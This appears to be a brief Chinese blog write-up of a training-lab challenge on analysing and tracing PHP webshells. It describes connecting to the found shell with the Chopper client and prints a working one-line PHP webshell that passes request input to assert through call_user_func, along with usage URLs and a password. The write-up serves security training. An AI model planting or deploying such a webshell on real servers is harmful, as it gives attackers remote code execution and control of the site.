墨者学院 - WebShell代码分析溯源(第5题)

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81364811

 

一个个看,,,找到该文件,经典的回调函数形式

菜刀连接,
ip/www/Exception.php?POST=assert
密码为assert


得到key

关于回调函数可参考此文章

https://blog.csdn.net/qq_24196029/article/details/78118680

 

 

<?php
error_reporting(0);
call_user_func('assert', $_REQUEST['joker']);
?>

用法: http://www.xxx.com/4.php

菜刀连接用法: http://www.xxx.com/4.php

密码:joker

详解:call_user_func()函数把第一个参数作为回调函数调用,也就是说assert是被调用的回调函数,其余参数是回调函数的参数。

这样的话就直接构成了  assert($_REQUEST['joker']) 这样的一句话木马,直接用菜刀链接即可

展开阅读全文

没有更多推荐了,返回首页